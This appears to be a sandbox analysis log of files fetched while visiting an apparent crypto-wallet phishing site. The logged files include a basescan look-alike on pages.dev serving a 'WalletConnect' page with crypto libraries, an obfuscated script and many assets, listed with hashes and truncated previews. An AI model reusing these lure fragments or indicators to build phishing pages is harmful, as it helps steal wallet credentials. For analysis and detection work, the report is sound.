                                                                                                                                                                                                                                              MD5:441971E141A5663B2F06E4926F3E3572
                                                                                                                                                                                                                                              SHA1:C6264BED94A71874CDF1D14BF3640580AD3B3F08
                                                                                                                                                                                                                                              SHA-256:2CA4AC3D1844EE99E8FAD83ED1DD3DE912D9B4A7C0F218EEB1F8545F77E2922C
                                                                                                                                                                                                                                              SHA-512:F5C7B3ADE4EF6A867E92C800DEEB9A922554C5A069A05150CA4CE8DB4130D2DEF3C2CC10FD35D3AC85EDCF354AB971AC81589E5D19161D22E415CD82D1F0709A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/main/empty-token.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............\r.f....IDATx..Kh\e..}"..*>.......*..c.B..7.....u.t'X..U......kS...B......$:4..i.i.>.I.1M.GKM.9C.A.&..{.....?(m.I....fN..}.A.0<..#...0z.X69.-.....y.N^v:...v9.eb.w.C.e.y........}.}.}.}.}...K...}m{.{-{MT..2RG..-..!b}.y.h...u...Z...U_[*............{E. .N..=.Z...O......5...#.....7...T#......=...5.....q."...._a. @.......E...5.Fo.._.......VK8.....2W.u.u.<g..d.ZVk..3Vc8...^.v.|L^G..t..[...p..0.J...8z.... ...o.-.....|...=.r.!....b}.z..B.hO..f[l...B.O.7.e.z..B..#..q......Ys`...[.....B.<B^v"P...z.GC+R..O.k'..ZT{..Sp8Tk.w...aiyv..w..PUa.{-.l%...G..r...X.6U..8....Q..=...e.y..h#......a.............y.`|....+...........|.Gl.7.:j.9.=.....*9`.A..w.w1.l..>P/.......t..e.L..Ava6.$..=.;..0-H.a....Sm..K.#?..-.y.....I...Ya^.[......c.....3l.C...R.t9.~.M=.q...}."..m..t,...r.K`.D23....w^.a<./.....<.s^*0..'R..F)..O..`.....{z.P..1....E~...e..K.B1.OON.S3q.F.I..W.Hnrg.M.X.r..xff&6...FM..<.Q,?.._...9.r..J....OMM/.....1...$...1.#.u..l..........st.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):13360
                                                                                                                                                                                                                                              Entropy (8bit):5.635058839476275
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:9pQGDuD690MPdz8Ui015ll1I57I2Tru6h0hNmHV+m9eIfyAqYfinNVYEUUFJZmUY:9OiT0wz8Uiw/1S7DegkcHpeIuScZbAX
                                                                                                                                                                                                                                              MD5:4FF108E4584780DCE15D610C142C3E62
                                                                                                                                                                                                                                              SHA1:77E4519962E2F6A9FC93342137DBB31C33B76B04
                                                                                                                                                                                                                                              SHA-256:FC7E184BEEDA61BF6427938A84560F52348976BB55E807B224EB53930E97EF6A
                                                                                                                                                                                                                                              SHA-512:D6EEE0FC02205A3422C16AD120CAD8D871563D8FCD4BDE924654EAC5A37026726328F9A47240CF89ED6C9E93BA5F89C833E84E65EEE7DB2B4D7D1B4240DEAEF2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js
                                                                                                                                                                                                                                              Preview:/*.CryptoJS v3.1.2.code.google.com/p/crypto-js.(c) 2009-2013 by Jeff Mott. All rights reserved..code.google.com/p/crypto-js/wiki/License.*/.var CryptoJS=CryptoJS||function(u,p){var d={},l=d.lib={},s=function(){},t=l.Base={extend:function(a){s.prototype=this;var c=new s;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},.r=l.WordArray=t.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=p?c:4*a.length},toString:function(a){return(a||v).stringify(this)},concat:function(a){var c=this.words,e=a.words,j=this.sigBytes;a=a.sigBytes;this.clamp();if(j%4)for(var k=0;k<a;k++)c[j+k>>>2]|=(e[k>>>2]>>>24-8*(k%4)&255)<<24-8*((j+
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 200x267, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):20111
                                                                                                                                                                                                                                              Entropy (8bit):7.89732805253213
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:hYNg7EdlZBUEvDRP12IdhTurAxEN94aTVLmWMJQgN1x1rv6XaGdADYp4u/:hYyeZRd2IfTG9PTGQK96XaqADnm
                                                                                                                                                                                                                                              MD5:E5552644E3707B83067969331AFE8153
                                                                                                                                                                                                                                              SHA1:50468060D3BEEB17F582E172185948B07CEC58BE
                                                                                                                                                                                                                                              SHA-256:DEAA01A2C96D758241C8198C1EA7C49E5C0A27270CD99ADB19D7A2B4D9A8EEE7
                                                                                                                                                                                                                                              SHA-512:BF9B94009D2F12C1C50EC5DC9BA91350F36FD5748E1A51FCC8D0EDFF4963CE11E685173054D6766DB3D4F1D0D5452DDC2ACB3DD759B563E59B1C8C1F29C584BF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:exported SGML document, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                              Entropy (8bit):2.931208948910323
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:j4jIL:7
                                                                                                                                                                                                                                              MD5:365DB0225D53BBC9CCD23FDF5C704CAA
                                                                                                                                                                                                                                              SHA1:719E41AD1D8198DC13F0AA2C416F42389C2C56AE
                                                                                                                                                                                                                                              SHA-256:EB99134542C987F687360D120213EEEC049A290D73D2302EE1B74A01CE279F4D
                                                                                                                                                                                                                                              SHA-512:BEE5F22ABB72E95798DBF27AF554509169373874664A442699C336EB268FC3C28064EA9A191B092D0CFAFBCE420B47D8CBC0CA539AD52A5D16B51A4ED882C35F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://widget.getblue.io/event/?cId=A0CFAC1E-B13F-B1FB-FE4BEDC860AA7E5B&tName=visit&pId=&revenue=&orderId=&p1=&p2=e%3Dvp&p3=e%3Ddis&adce=1&dtycbr=87954&fp=&blueID=d699c8fb-0495-44e7-bb4e-319fe1118aff&ulc=p3uc729n&v=29092023-1023&if=0&nocache=8139716140856.065
                                                                                                                                                                                                                                              Preview: cms -->.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/assets/js/custom/commonjs_token.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8124
                                                                                                                                                                                                                                              Entropy (8bit):7.621714398803816
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+77oYNMtKwXSdj74GIkF/IPbtMzbsRI8B7/:vYNg7XSdUkF/OhMzAy8J
                                                                                                                                                                                                                                              MD5:BA4266F94CEC450379FE1CA5CD449294
                                                                                                                                                                                                                                              SHA1:55472AE5FC719A9A46740BC5E6454C9A613542E9
                                                                                                                                                                                                                                              SHA-256:EF946C199206F2399C82E34DA38FFF3E8181A78AAB94FA90404979BF69510FCC
                                                                                                                                                                                                                                              SHA-512:E4ACD73D2D928AB95AE55FBF2F98099E6A556940D20102AF2DEE864BFD3C8304A08EF3D4598E60A7E8CF89E6545BEB6EF5F035A35CF64B0064120893B8750AE4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/90ba079bba.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............F...v.............<...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):10250
                                                                                                                                                                                                                                              Entropy (8bit):4.006263718380211
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:4domVIr1C23oYo/boM0PrxIVq9tb9GiLkQD8grBjjAt+V5wn3:GfIsVYqb0zxBkQggrBjj9O3
                                                                                                                                                                                                                                              MD5:B41FFF5E4E43AC0DF4E6AC6DC8EAEBA9
                                                                                                                                                                                                                                              SHA1:E9A1A0C286CFF6CDC44B1F8E0F0538DBEE3F10CD
                                                                                                                                                                                                                                              SHA-256:8ED21BBA60CA98AE691ADFB74B04E4865A2C77E3AC89D5670E123FC2CABBE00E
                                                                                                                                                                                                                                              SHA-512:8A5B4CC1F1B5C188313E97BE8DF31014C35098A0D100B569C1D0605A76F9DB5043D17A32BAF4E82C2CB0C4DD71D68DC42FC147569FE7FA8C0A0B18EB1C9DCE91
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/logo-ether.svg?v=0.0.7
                                                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="542.249" height="121.152" viewBox="0 0 542.249 121.152">.. <g id="etherscan-logo" transform="translate(-219.377 -213.516)">.. <path id="Path_8" data-name="Path 8" d="M12.333-43.9q0-6.084-4.193-6.084a6.742,6.742,0,0,0-1.727.164,12.4,12.4,0,0,1-2.22.247,2.4,2.4,0,0,1-1.809-.781,2.7,2.7,0,0,1-.74-1.932q0-2.878,3.442-2.878.082,0,1.228.082,12.29.822,11.472.822H18.6l19.747-.576q.574,0,4.261-.247,1.31-.082,2.375-.082,4.261,0,4.261,3.782,0,.658-.235,4.193-.176,2.631-.176,4.851a39.539,39.539,0,0,0,.137,4.029,34.313,34.313,0,0,1,.274,3.535q0,3.124-2.96,3.124t-2.96-4.378v-4.3q0-6.938-2.867-8.178-2.131-.908-10.98-.908a49.477,49.477,0,0,0-6.883.251q-3.524.919-3.524,5.011v8.222q0,3.289,1.459,3.782a7.91,7.91,0,0,0,1.946.164H25.8q5.109,0,5.109-3.535a20.357,20.357,0,0,0-.206-2.549,21.659,21.659,0,0,1-.206-2.8q0-3.289,2.919-3.289t2.919,3.535q0,.658-.532,5.1a56.592,56.592,0,0,0-.455,6.66q0,1.644.329,5.838.082.658.411,2.878a22.477,22.477,0,0,1,.247,2.878,
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2025)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2026
                                                                                                                                                                                                                                              Entropy (8bit):4.865682003774018
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:w2ZKtXWMeN8aO6xSsf438do0DQ4PjYsBqd64kUceuh:FZKtXSbOGI38doycsioUbuh
                                                                                                                                                                                                                                              MD5:9A97D72D966F2E28C984E6559C01DF26
                                                                                                                                                                                                                                              SHA1:755B041EFEAA5DCEE5F7872FD8DF4EAFA7F7B8C7
                                                                                                                                                                                                                                              SHA-256:6C2D2D1AB4D322AA54FBF81F78DE107B5A481C9A6D1B1700ED21E67B358DAB93
                                                                                                                                                                                                                                              SHA-512:49D7C09DD69D9BCB3DD93B4CDA8128E232577C632DF188C16AB01BD84CCADD376402036F74A117DF68C14AE430AB1CC8A3E4CAF8B42BCCFBE5E9791C7FCB0D7F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{Aliases:t,Assets:s,ChildProperties:a,DOMElements:n,DelegatedEvents:o,Dynamic:c,ErrorBoundary:i,For:l,Hydration:d,HydrationScript:u,Index:p,Match:S,NoHydration:g,Portal:y,Properties:m,RequestContext:h,SVGElements:E,SVGNamespace:b,Show:$,Suspense:C,SuspenseList:x,Switch:P,addEventListener:A,assign:f,classList:v,className:w,clearDelegatedEvents:M,createComponent:D,delegateEvents:H,dynamicProperty:R,effect:T,escape:L,generateHydrationScript:N,getAssets:k,getHydrationKey:O,getNextElement:q,getNextMarker:F,getNextMatch:B,getOwner:I,getPropAlias:V,getRequestEvent:_,hydrate:z,innerHTML:K,insert:G,isDev:j,isServer:U,memo:W,mergeProps:X,render:Y,renderToStream:J,renderToString:Q,renderToStringAsync:Z,resolveSSRNode:ee,runHydrationEvents:re,setAttribute:te,setAttributeNS:se,setProperty:ae,spread:ne,ssr:oe,ssrAttribute:ce,ssrClassList:ie,ssrElement:le,ssrHydrationKey:de,ssrSpread:ue,ssrStyle:pe,style:Se,template:ge,untrack:ye,use:me,useAssets:he}=e.h0lnfr,r=globalThis._bc,{
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8225)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8226
                                                                                                                                                                                                                                              Entropy (8bit):5.317941775094837
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:q7Ns6R6zO7Hx6RSXOGbhXe4nx4nPVgYGDvuh5NgVHRwsZbfFvtbi56TdSSUGpxWu:qpshIDZWh50ZDG56T0leUGr
                                                                                                                                                                                                                                              MD5:AE109BCEB2637BFCF5DA1766F4287899
                                                                                                                                                                                                                                              SHA1:227B9FFB6DC7D98F66217C39D25504B10E89A018
                                                                                                                                                                                                                                              SHA-256:B20D7F34DA561F1CD195167A8451762E4279C2ACFAD430A7037A88E78236160C
                                                                                                                                                                                                                                              SHA-512:5FBB5D7EB6B559BFFCC6CE8462F423DEA45BA78E758AB2DD90E2D3E2528FAA8D8EC5E4E0C56FEB43C679451E3780CE6DDF4CCEF4DB7EDB875849E877AEF6FBF1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/Contest-BCVAsTyf.js
                                                                                                                                                                                                                                              Preview:import{aW as E,i as t,t as s,c as r,aX as K,h as $,f as v,a as I,a1 as k,aH as Y,l as C,x as j,a5 as Z,aY as q,aZ as O,q as W,D,s as h,aD as M,p as B,F as Q,Q as X,a6 as G,m as J,e as U}from"./index-DD2Zk4iT.js";import{C as z,a as y}from"./ContestList-BC0hkzon.js";import{n as V,c as R,a as ee,b as te}from"./common-DVIU4ngr.js";var re=v('<div class="flex-col rounded-md bg-layer2 py-1 center w-12"><div class="text-xl font-extrabold text-primary"></div><div class=text-xxs>'),le=v('<div class="w-48 rounded-lg bg-layer4 px-2 flex-3 py-7 lg:!px-10"><div class="mb-3 text-center font-semibold text-xs"></div><div class="flex justify-around">');function w(e){return(()=>{var a=re(),c=a.firstChild,u=c.nextSibling;return t(c,()=>V(e.value)),t(u,()=>e.name),a})()}function ne(){const{contest:e,refetch:a}=R,c=E(()=>e.endTime.getTime());return(()=>{var u=le(),i=u.firstChild,l=i.nextSibling;return t(i,()=>s("Time Remaining")),t(l,r($,{get when(){return c()},keyed:!0,get fallback(){return K(()=>e.endTime
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8348)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8349
                                                                                                                                                                                                                                              Entropy (8bit):5.292403550625203
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:uVzhXyeV17RhDQrjea0/t6P1LgfK/NnGxsdDLinLbvb:IyeV17X0rjmF6PEK/BGxsRuLv
                                                                                                                                                                                                                                              MD5:55D724A00A5E3BA0D1899DD4EC4D972E
                                                                                                                                                                                                                                              SHA1:9E2EC7F6A5D498A39FDAF96852020B8A72B5CFD2
                                                                                                                                                                                                                                              SHA-256:686CADE04510B4439FC2BE5821C3BA36424143503DDF7EBC7BA23FAF47F154AD
                                                                                                                                                                                                                                              SHA-512:2A031D6A6A592D3612EF84D8FDDD964FC46D9245BB0B21B0A07FF326CB982862AC8D6222AE21F14E727AAF59698BA6001D7B91D22F41F70481CA47FFC94D8104
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-fc48f31f.js
                                                                                                                                                                                                                                              Preview:import{i,e as x,s as g,t as o,c as a,j as P,b as j,m as k}from"./web-13cf6287.js";import{T as h,B as p,h as $,c as R,u as _,A as C,p as S}from"./manifest-51a3674f.js";import{L as Y}from"./index-3fd48be3.js";import{m as F,i as I,c as M,F as w}from"./solid-js-38561dfe.js";import{A as U}from"./animate-number-f0294c10.js";import{C as L}from"./currency-format-1c532f37.js";import{t as c}from"./i18n-fcfac1d2.js";import{R as v}from"./type-bfb25fc4.js";import{e as m}from"./index-96ed660e.js";var T=o('<img class="absolute left-44 top-14 animate-heartbeat animation-duration-1000">'),N=o('<img class="absolute left-24 top-32 animate-heartbeat animation-duration-1000">'),O=o('<img class="absolute left-15 top-24 animate-heartbeat animation-duration-1000">'),A=o('<div class="relative z-0 flex h-60 w-full items-center justify-center"><div class="absolute left-1/2 top-1/2 size-3/4 -translate-x-1/2 -translate-y-1/2 bg-gradient-bonus_wallet"></div><img class="z-0 size-28 animate-wallet animation-duration-
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 311 x 110, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3351
                                                                                                                                                                                                                                              Entropy (8bit):7.893903081290968
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:A4m2InGtNHErpV3K8P3/ajBvIPeFsvIQ0zfaFtZfShZ:A4m2JPkrpVa8P3/ajBgmFu8aF7fShZ
                                                                                                                                                                                                                                              MD5:FFBDCBA39AB36302B719B0DB7386791A
                                                                                                                                                                                                                                              SHA1:6C1D03F1DB12438DD13281BFC1123189E0035A0A
                                                                                                                                                                                                                                              SHA-256:18C115D24E4303350FDA8745995C49D599027D88680FCBC67BC1C946EC2D87FB
                                                                                                                                                                                                                                              SHA-512:F3A749A5009FDE17787D60DA142101FC53FFD89F852691FA2E7C6FC2EFD02AC60BF55EB855E5BACE623BD187B70F5F45BF3044EC424B3FE5732CCA8739EA29F4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...7...n.....u......BPLTE...................................................................tRNS.. @.`.....p.0.pPP.._Q,9....oIDATx....0.@%...P..._m.B....,..r^.e..D...?......*.D.R...%.[0\.....J...t..E......;.5d...;.t...^a..%8......a......"...*o..................y..6o.C@D.b.........h,?.p...-..~.?...f...>....H.....D..7.x.8.!.p.....;..y..v..:.0O..l.......>C&A..~:..^ ........f.91s......k....i{....._d..i4..d.X...E%.T...;.{...7....E.X.....5(.%.-.Y...SPP`.L.:...~.v.9yt....u-..f.5.8.6U."..j.....k..j..N.+/.....lF..4.x.`{iJ....ST...[D.8.B]..>......[KP.....T{.d...F.2=G<..8.$..]1..f.C.r..x.nOO.L..q..aa.5w.I{..+y.^.)V...r..%j.j9.6Y..S.{..><.,.yX..R.Y...M[.f.+i...V_.Aw......n /^.U[..8.-U.d....d\G..9...j;..?...>.......".I.2..8c.s.jQ7.t..~.E.w....s[o\..0.g.......;...,.8.8...jc[...#....+ZY....x{HJ..4Y.i.....n.MTB.z.Pv1s.-...P%#.;.H.P!..Kn.U..V...u>......l.U&!0-..M..#U~.xj.=.....L'.K[_uw..*..m..W......-.H.MHp.0..q..".+....V..a.N3.vjr.a..."...-....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29951), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):29951
                                                                                                                                                                                                                                              Entropy (8bit):5.742557177305259
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:BXIZfeeORU1bWtvb6zcB5Fwv4LlnyRhv+r3urDOwb0cp9TNsB9bsBKRMoJxHVLLE:KOUdRhv+r3CpW8e/JtVHDqT5cbe
                                                                                                                                                                                                                                              MD5:C41768CA74EE8B9B25988040906F6C31
                                                                                                                                                                                                                                              SHA1:50808F154AB3ADCC14575C420CF2BF910D14D5B6
                                                                                                                                                                                                                                              SHA-256:70E658CACF830181AF17C94BE2D953D86143582786CCF57FB6F3417613C9CF51
                                                                                                                                                                                                                                              SHA-512:DC87D3E68E48CFFD95FA566702FB72DE56948CEB6330CDD553BAA6F0165D62A3C903ED081390A4E76D78508C8DFA6F2486053A3A35252FBB757B2CBAC88B135E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://scripts.mediamathrdrt.com/scripts/pix_bcgame.js
                                                                                                                                                                                                                                              Preview:(function(){t1bx0[458838]=(function(){var j8=2;for(;j8 !== 9;){switch(j8){case 2:j8=typeof globalThis === '\u006f\x62\x6a\u0065\u0063\u0074'?1:5;break;case 1:return globalThis;break;case 5:var P3;try{var k6=2;for(;k6 !== 6;){switch(k6){case 3:throw "";k6=9;break;case 2:Object['\u0064\x65\x66\u0069\u006e\x65\x50\u0072\u006f\u0070\x65\x72\u0074\x79'](Object['\x70\x72\u006f\x74\x6f\u0074\x79\x70\x65'],'\u0057\x38\x63\x48\u0035',{'\x67\x65\x74':function(){return this;},'\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x62\x6c\x65':true});P3=W8cH5;P3['\x62\u0074\u0035\u0033\x62']=P3;k6=4;break;case 4:k6=typeof bt53b === '\x75\x6e\x64\x65\x66\u0069\u006e\x65\u0064'?3:9;break;case 9:delete P3['\u0062\x74\x35\x33\u0062'];var m0=Object['\x70\u0072\x6f\x74\x6f\x74\u0079\x70\x65'];delete m0['\u0057\x38\x63\x48\x35'];k6=6;break;}}}catch(x4){P3=window;}return P3;break;}}})();t1bx0.d$ITV=d$ITV;v4NY_L(t1bx0[458838]);t1bx0[417987]=(function(){var k0=2;for(;k0 !== 5;){switch(k0){case 2:var c6={o8b3gVv:(function(G6
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
